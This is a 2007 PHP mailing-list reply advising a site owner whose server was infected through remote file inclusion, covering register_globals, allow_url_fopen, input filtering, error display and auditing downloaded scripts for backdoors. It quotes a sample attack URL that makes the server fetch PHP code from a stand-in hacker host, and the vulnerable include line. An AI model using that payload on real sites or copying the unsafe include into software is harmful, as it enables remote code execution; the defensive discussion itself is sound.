> -----Message d'origine----- > De : Stut [mailto:stuttle@xxxxxxxxx] > Envoyé : vendredi 2 mars 2007 20:23 > À : Seak, Teng-Fong > Cc : php-windows@xxxxxxxxxxxxx; php-general@xxxxxxxxxxxxx > Objet : Re: [PHP] Re: Question on virus/worms > > Seak, Teng-Fong wrote: > > But after I've spent some time reading the log files, > I've finally > > found out how the hackers managed to achieve worm infiltration. > > > > Actually, they're using an URL like this: > > > http://my-domain.com/index.php?page=http://hacker-domain.com/s > ome-worm-file.txt? *smirk* > > > > And the some-worm-file.txt file contains some PHP code, > while my > > index.php contains this instruction: > > include("$page.php"); This one line brings up two known php coding security issues, learn about them on http://phpsec.org > > > > This is enough to make infiltration possible! IMO, this > > instruction is supposed to be used like this, isn't it? NO it is not! See above.. > >So this is > > obviously a PHP security loophole YES! Learn about register_globals, allow_url_fopen, include() Infact go learn PHP before blindly running scripts in a production environment! Or if you really don't want too learn php at least subscribe to bugtraq mailing list and go through the archive to see if the script you want to run has a security history, see if they follow up on the issues or just "ignore" the issues, and keep informed to see if any new issues have been brought to hand. > >and I don't see how the "poorly > > written scripts" can help anything unless a totally rewrite! Not neccassarily a total rewrite, try implementing some functions to retrieve/filtre your $_GET $_POST data, turn off register_globals, replace all variables relying on register globals with your newly implemented functions.. Use regular expressions to find the data that needs to be changed in your scripts.. > > And > > there's no "poor server security" that I can see. I think its time for you to take a pause on installing these scripts you are downloading and read up on the php.ini configuration file, also do a search on php history and security. Follow the changes in different php versions aswell their are a lot of hints as to what "default" values have changed to improve chances of "poorly written scripts" not being vulnerable. BUT unless you understnad the issues involved these default values are a false excuse for thinking your scripts is "secure". (ie upgrading to php5: you did it, it solved your problem, but you still don't know why because you don't know what value was changed in your php configuration) Those few steps will definately be able to give you an idea of what kind of security issues exist, eventually how they are circumvented, and ideas on how you can improve your existing scripts to avoid these issues. Once you are comfortable with this, before you use a script downloaded from the inet in a production environment, go through the code and make sure you don't see any backdoor code (unecessary fsockopen(), exec() etc.. That isn't related to the scripts original use). Also a good thing to look out for is scripts that run with register_globals = off in the php.ini this at least ensures "forced" good practice in coding (this does not mean one cannot code well with register_globals = on, it just releaves a potential security issue for the programmer and force him to call url passed variable in a proper manner ie: using PHP Super Globals, to be able to use them) > > > I've installed PHP5 and the problem seems fixed. However, PHP > > writes out where the problem occurs! Indeed, the hacker > could read a > > line like this: > > Warning: include() [function.include]: URL file-access is > disabled in > > the server configuration in C:\Inetpub\wwwroot\index.php on line X > > > > I don't want them (the hackers) to be able to read this either. > > That gives too much information about my server's file system. How > > can I stop that? Once again learn about php.ini and how it works (re: Stut mentioned - error_reporting). > > By the way, I know there're still a lot of servers out > there still > > using PHP4. Is this vulnerability a known bug? At least, I'm not > > aware of that before! > > It's not a bug. It will never be a bug. Yes PHP5 (I believe > it's 5.2+) introduces the ability to turn off the ability to > prevent this issue, but it's still badly written code. Stop > blaming the tool, start blaming the mirror image and start > learning how to code defensively. Can't agree more.. Don't "think" youre secure and live with it, someday it will bite you when you least expect it.. Make it a part of your everyday work to constantly reduce the risk of unwanted "intrusions".. Regards, Tim -- PHP Windows Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
